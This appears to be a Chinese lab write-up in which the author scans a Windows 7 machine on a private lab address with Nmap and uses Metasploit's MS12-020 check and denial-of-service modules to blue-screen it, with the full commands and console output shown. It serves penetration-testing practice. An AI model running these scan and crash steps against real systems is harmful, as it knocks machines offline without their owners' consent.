一、使用环境和器材

1、本机操作系统: Kali Linux 3.26.2

2、目标ip: 192.168.0.10

3、Nmap版本: 7.6 ;

4、Metasploit版本: 4.16.64-dev

二、实验内容

1、运用Nmap扫描目标主机,根据参数得到目标主机的开放端口、操作系统版本号及主机明细,进一步对目标主机展开分析。

2、运用Metasploit对目标主机所存在的漏洞进行利用。

三、在Kali Linux上运行zenmap

Zenmap是Nmap官方提供的图形界面,通常随Nmap的安装包发布。Zenmap是用Python语言编写而成的开源免费的图形界面,能够运行在不同操作系统平台上(Windows/Linux/Unix/Mac OS等)。Zenmap旨在为nmap提供更加简单的操作方式。简单常用的操作命令可以保存成为profile,用户扫描时选择profile即可;可以方便地比较不同的扫描结果;提供网络拓扑结构(NetworkTopology)的图形显示功能。

我改成了

nmap -O 192.168.0.10

算了还是用nmap吧。

╭─root at kali in ~ using
╰─○ nmap -O 192.168.0.10

一定是抽筋了。。然后我关掉了Windows7的防火墙。

╭─root at kali in ~ using
╰─○ nmap -Pn 192.168.0.10

端口终于扫出来了。

目标主机Windows 7

尝试使用ms12-020对目标主机进行攻击。

╭─root at kali in ~ using
╰─○ msfconsole

msf > search ms12-020

auxiliary/scanner/rdp/ms12_020_check    #检查是否存在ms12-020

auxiliary/dos/windows/rdp/ms12_020_maxchannelids    #使用该模块进行攻击

msf > use auxiliary/scanner/rdp/ms12_020_check

msf auxiliary(scanner/rdp/ms12_020_check) > show options

msf auxiliary(scanner/rdp/ms12_020_check) > set RHOSTS 192.168.0.10

msf auxiliary(scanner/rdp/ms12_020_check) > run

[+] 192.168.0.10:3389 - 192.168.0.10:3389 - 目标很脆弱。
[*]扫描1个主机中的1个(100%完成)
[*]辅助模块执行完成

目标主机存在ms12-020的漏洞

msf auxiliary(scanner/rdp/ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set RHOST 192.168.0.10

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options

msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > run

[*] 192.168.0.10:3389 - 192.168.0.10:3389 - 发送MS12-020 Microsoft远程桌面使用后免费DoS
[*] 192.168.0.10:3389 - 192.168.0.10:3389 - 发送210个字节
[*] 192.168.0.10:3389 - 192.168.0.10:3389 - 检查RDP状态......
[+] 192.168.0.10:3389 - 192.168.0.10:3389似乎失败了
[*]辅助模块执行完成

目标主机已经蓝屏了。攻击完全。

 

0

正因为生来什么都没有,因此我们能拥有一切。